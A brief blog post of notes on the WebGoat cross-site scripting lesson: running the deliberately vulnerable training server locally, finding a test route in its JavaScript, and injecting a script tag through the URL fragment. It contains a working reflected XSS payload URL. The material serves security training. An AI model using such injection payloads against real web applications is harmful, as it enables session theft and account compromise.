Wednesday, December 29, 2021

cross site scripting intro WebGoat

download webgoat @ https://github.com/WebGoat/WebGoat/releases
if webgoat build version is higher than linux java version, download previous version

start server
java -Dfile.encoding=UTF-8 -Dserver.port=8080 -Dserver.address=localhost -Dhsqldb.port=9001 -jar webgoat-server-8.1.0.jar

open http://localhost:8080/WebGoat/
register new user

xss lesson 10 -> inspect element -> debugger ->goatRouter.js -> find test route
https://www.youtube.com/watch?v=xb3O3nlWSAw

inject script into url
http://localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();<%2Fscript>
inspect element -> console -> script executed
https://www.youtube.com/watch?v=zCGOvvQknoc
reference:
https://www.youtube.com/watch?v=2_lswM1S264
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)